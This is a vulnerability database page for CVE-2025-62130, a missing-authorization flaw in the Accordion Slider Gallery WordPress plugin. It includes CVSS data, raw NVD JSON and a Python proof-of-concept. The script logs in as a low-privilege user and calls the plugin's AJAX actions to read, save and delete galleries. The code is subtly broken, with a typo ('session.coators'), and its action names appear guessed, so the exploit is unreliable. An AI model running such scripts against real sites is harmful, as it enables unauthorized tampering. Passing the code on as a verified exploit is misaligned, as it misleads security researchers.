Security Vulnerability Report
中文
CVE-2025-62130 CVSS 4.3 MEDIUM

CVE-2025-62130

Published: 2025-12-31 16:15:45
Last Modified: 2026-04-23 15:34:36

Description

Missing Authorization vulnerability in wpdiscover Accordion Slider Gallery accordion-slider-gallery allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Accordion Slider Gallery: from n/a through <= 2.7.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Accordion Slider Gallery <= 2.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62130 PoC - Missing Authorization in Accordion Slider Gallery # Affected: Accordion Slider Gallery <= 2.7 # CVSS: 4.3 (Medium) import requests import sys TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker_account" PASSWORD = "attacker_password" def get_wordpress_nonce(url, cookie): """Extract security nonce from WordPress admin page""" response = requests.get(f"{url}/wp-admin/admin.php?page=accordion-slider-gallery", cookies=cookie) if response.status_code == 200: import re nonce_match = re.search(r'data-nonce="([a-zA-Z0-9]+)"', response.text) if nonce_match: return nonce_match.group(1) return None def exploit_missing_auth(): """Exploit Missing Authorization vulnerability""" session = requests.Session() # Step 1: Login as low-privilege user login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } login_resp = session.post(f"{TARGET_URL}/wp-login.php", data=login_data) if 'wordpress_logged_in' not in str(session.cookies): print("[-] Login failed") return False print("[+] Logged in as low-privilege user") # Step 2: Get nonce (if required by plugin) nonce = get_wordpress_nonce(TARGET_URL, session.coators) # Step 3: Exploit the missing authorization - access protected functions exploit_endpoints = [ '/wp-admin/admin-ajax.php?action=asg_get_galleries', '/wp-admin/admin-ajax.php?action=asg_save_gallery', '/wp-admin/admin-ajax.php?action=asg_delete_gallery' ] for endpoint in exploit_endpoints: exploit_data = { 'action': endpoint.split('action=')[1].split('&')[0], 'gallery_id': '1', 'nonce': nonce if nonce else '' } resp = session.post(f"{TARGET_URL}{endpoint}", data=exploit_data) if resp.status_code == 200 and 'error' not in resp.text.lower(): print(f"[+] Successfully accessed: {endpoint}") print(f"[+] Response: {resp.text[:500]}") return True if __name__ == "__main__": exploit_missing_auth()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62130", "sourceIdentifier": "[email protected]", "published": "2025-12-31T16:15:45.453", "lastModified": "2026-04-23T15:34:35.803", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in wpdiscover Accordion Slider Gallery accordion-slider-gallery allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Accordion Slider Gallery: from n/a through <= 2.7."}, {"lang": "es", "value": "Vulnerabilidad de falta de autorización en WPdiscover Accordion Slider Gallery permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Accordion Slider Gallery: desde n/a hasta 2.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/accordion-slider-gallery/vulnerability/wordpress-accordion-slider-gallery-plugin-2-7-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}